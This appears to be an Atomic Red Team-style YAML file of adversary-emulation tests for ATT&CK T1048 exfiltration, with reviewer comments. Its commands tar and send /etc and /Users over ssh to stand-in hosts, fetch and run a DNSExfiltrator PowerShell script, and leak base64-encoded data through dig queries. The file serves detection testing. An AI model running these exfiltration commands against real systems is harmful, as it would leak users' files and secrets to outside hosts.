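---
# Atomic test definitions for ATT&CK technique T1048 (Exfiltration Over
# Alternative Protocol). Each entry under atomic_tests is one runnable test;
# the #{name} placeholders in commands refer to that test's input_arguments
# and are substituted by the test runner before execution.
attack_technique: T1048
display_name: Exfiltration Over Alternative Protocol
atomic_tests:
  # Test 1 — SSH, remote to local: the remote /etc tree is tarred over an ssh
  # session and the stream is written to ./etc.tar.gz in the local working
  # directory.
  - name: Exfiltration Over Alternative Protocol - SSH
    auto_generated_guid: f6786cc8-beda-4915-a4d6-ac2f193bb988
    description: |
      Input a domain and test Exfiltration over SSH

      Remote to Local

      Upon successful execution, sh will spawn ssh contacting a remote domain (default: target.example.com) writing a tar.gz file.
    supported_platforms:
      - macos
      - linux
    input_arguments:
      domain:
        description: target SSH domain
        type: url
        default: target.example.com
    executor:
      # No user is given on the ssh command line, so ssh falls back to the
      # invoking account's local username and ssh configuration.
      command: |
        ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
      name: sh

  # Test 2 — SSH, local to remote: /Users/* is tarred, encrypted with openssl
  # and streamed to the remote host, which stores it as /Users.tar.gz.enc.
  - name: Exfiltration Over Alternative Protocol - SSH
    auto_generated_guid: 7c3cb337-35ae-4d06-bf03-3032ed2ec268
    description: |
      Input a domain and test Exfiltration over SSH

      Local to Remote

      Upon successful execution, tar will compress /Users/* directory and password protect the file modification of `Users.tar.gz.enc` as output.
    supported_platforms:
      - macos
      - linux
    input_arguments:
      user_name:
        description: username for domain
        type: string
        default: atomic
      # The password is consumed by openssl for encryption only; ssh itself
      # authenticates interactively or by key, as no credential is passed to it.
      password:
        description: password for user
        type: string
        default: atomic
      domain:
        description: target SSH domain
        type: url
        default: target.example.com
    executor:
      # NOTE(review): openssl's -pass option expects a source prefix
      # (pass:, env:, file:, ...) and rejects a bare value, so as written the
      # openssl stage is expected to fail. Left unchanged; confirm against the
      # openssl version in use before relying on this test.
      # NOTE(review): /Users/* is the macOS home-directory layout and the
      # remote destination is at the filesystem root (/Users.tar.gz.enc),
      # which needs write access to / — verify both on the linux platform
      # listed above.
      command: |
        tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'
      name: sh

  # Test 3 — DNS over HTTPS via the DNSExfiltrator PowerShell module (Windows).
  - name: DNSExfiltration (doh)
    auto_generated_guid: c943d285-ada3-45ca-b3aa-7cd6500c6a48
    description: |
      DNSExfiltrator enables the transfer (exfiltration) of a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.
      !!! Test will fail without a domain under your control with A record and NS record !!!
      See this github page for more details - https://github.com/Arno0x/DNSExfiltrator
    supported_platforms:
      - windows
    input_arguments:
      password:
        description: Password used to encrypt the data to be exfiltrated
        type: string
        default: atomic
      domain:
        description: The domain name to use for DNS requests
        type: string
        default: target.example.com
      ps_module:
        description: DNSExfiltrator powershell ps_module
        type: path
        # Single quotes keep the Windows path backslashes literal.
        default: 'PathToAtomicsFolder\..\ExternalPayloads\dnsexfil.ps1'
      doh:
        description: Google or CloudFlare DoH (DNS over HTTP) server
        type: string
        default: google
      time:
        description: The time in milliseconds to wait between each DNS request
        type: string
        default: "500"
      encoding:
        description: Set to '-b32' to use base32 encoding of data. Might be required by some DNS resolvers.
        type: string
        # Explicit empty string rather than a bare `default:` (which parses as
        # null) so the optional flag expands to nothing when unset.
        default: ''
    dependency_executor_name: powershell
    dependencies:
      - description: |
          DNSExfiltrator powershell file must exist on disk at specified location (#{ps_module})
        prereq_command: |
          if (Test-Path "#{ps_module}") {exit 0} else {exit 1}
        # The script is fetched from a commit-pinned URL, but the downloaded
        # file is not checksum-verified; review the pinned revision before
        # enabling this test on a managed host.
        get_prereq_command: |
          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
          IWR "https://raw.githubusercontent.com/Arno0x/DNSExfiltrator/8faa972408b0384416fffd5b4d42a7aa00526ca8/Invoke-DNSExfiltrator.ps1" -OutFile "#{ps_module}"
    executor:
      # The module file itself (-i "#{ps_module}") is the data being sent, so
      # no real host content leaves the machine during the test.
      command: |
        Import-Module "#{ps_module}"
        Invoke-DNSExfiltrator -i "#{ps_module}" -d #{domain} -p #{password} -doh #{doh} -t #{time} #{encoding}
      name: powershell

  # Test 4 — a single dig query whose leftmost label is the base64-encoded
  # secret_info value; the encoded value appears in the logs of every resolver
  # on the path, which is the detection artefact this test produces.
  - name: Exfiltrate Data using DNS Queries via dig
    auto_generated_guid: a27916da-05f2-4316-a3ee-feec67a437be
    description: |
      This test demonstrates how an attacker can exfiltrate sensitive information by encoding it as a subdomain (using base64 encoding) and
      making DNS queries via the dig command to a controlled DNS server.
    supported_platforms:
      - macos
      - linux
    input_arguments:
      dns_port:
        type: integer
        # Plain integer to match the declared type (was the quoted string '53').
        default: 53
        description: Attacker's DNS server port
      attacker_dns_server:
        type: string
        # NOTE: the default is a public resolver, so the encoded value is sent
        # off-site unless this is pointed at a resolver under your control,
        # which is what the description assumes.
        default: 8.8.8.8
        description: Attacker's DNS server address
      secret_info:
        type: string
        default: this is a secret info
        description: secret info that will be exfiltirated
    dependency_executor_name: bash
    dependencies:
      - description: dig command
        prereq_command: which dig
        # Package-manager fallback chain: each `||` branch is tried only when
        # the previous one fails.
        get_prereq_command: |
          which apt && sudo apt update && sudo apt install -y bind9-dnsutils || which yum && sudo yum install -y bind-utils || which dnf && sudo dnf install -y bind-utils || which apk && sudo apk add bind-tools || which pkg && sudo pkg update && sudo pkg install -y bind-tools || which brew && brew update && brew install --quiet bind
    executor:
      command: |
        dig @#{attacker_dns_server} -p #{dns_port} $(echo "#{secret_info}" | base64).google.com
      name: bash
    elevation_required: false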